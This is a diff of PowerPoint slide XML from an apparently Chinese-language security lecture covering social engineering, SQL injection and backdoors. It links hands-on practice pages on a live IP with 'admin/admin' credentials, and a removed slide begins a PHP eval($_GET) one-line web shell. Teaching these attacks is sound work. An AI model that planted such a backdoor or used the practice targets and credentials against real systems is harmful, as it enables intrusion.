+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>社交工程 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(Social Engineering)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="內容版面配置區 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
+                <a:latin typeface="Microsoft JhengHei" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="Microsoft JhengHei" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>實作</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
+              <a:latin typeface="Microsoft JhengHei" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="Microsoft JhengHei" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>http://35.201.159.86</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Microsoft JhengHei" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="Microsoft JhengHei" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1638728513"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B343474C-0735-45F4-AD70-C4D66D4EB92B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>社交工程 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(Social Engineering)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C0143805-285A-4BE2-8E47-16A12C1BFAC9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>概念</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>最大的漏洞，往往是人性</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>舉例</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>午餐系統</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>—</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>意外把最高權限密碼公開</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>吳邦寧</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>—</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>糟糕的電腦使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>習慣</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" b="1" u="sng" dirty="0" smtClean="0">
+                <a:effectLst>
+                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
+                    <a:srgbClr val="000000">
+                      <a:alpha val="43137"/>
+                    </a:srgbClr>
+                  </a:outerShdw>
+                </a:effectLst>
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>不要亂點來路不明的網站</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" b="1" u="sng" dirty="0">
+              <a:effectLst>
+                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
+                  <a:srgbClr val="000000">
+                    <a:alpha val="43137"/>
+                  </a:srgbClr>
+                </a:outerShdw>
+              </a:effectLst>
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2151663149"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{146C3F74-268E-4B66-8B47-F90B6077559A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>資料庫隱碼攻擊 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>SQL INJECTION</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DA69D91D-E907-4597-8E41-6313F813BE23}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>概念</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>讓資料被執行</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>舉例</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>沒魚蝦也好</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>沒魚蝦，也好</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>沒魚，蝦也好</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2497812298"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
 </p:sld>
 </file>
 
@@ -5173,7 +5518,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2E0D687-7D54-4270-9C3A-1FD9F27FAC53}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{79F6AB60-A92A-4E7C-9887-86CCC5FED8A1}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5194,7 +5539,7 @@
                 <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                 <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
               </a:rPr>
-              <a:t>後門 </a:t>
+              <a:t>資料庫隱碼攻擊 </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
@@ -5208,7 +5553,7 @@
                 <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                 <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
               </a:rPr>
-              <a:t>Backdoor</a:t>
+              <a:t>SQL INJECTION</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
@@ -5217,7 +5562,10 @@
               </a:rPr>
               <a:t>)</a:t>
             </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -5226,7 +5574,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEEEEDEB-C593-4938-A8AF-731282DAF81B}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{64C97741-7E9D-422C-9947-056A637E89F3}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5260,11 +5608,36 @@
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>http://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>35.201.159.86/sqlinjection.php</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
               <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                 <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                 <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
               </a:rPr>
-              <a:t>後門已經先植入好了</a:t>
+              <a:t>帳號密碼</a:t>
             </a:r>
             <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
               <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
@@ -5272,26 +5645,14 @@
             </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:pPr marL="457200" lvl="1" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>傳說中的一句話後門</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>admin/admin</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
@@ -5301,81 +5662,14 @@
                 <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                 <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               </a:rPr>
-              <a:t>&lt;?php eval($_GET[‘</a:t>
-            </a:r>
-            <a:r>
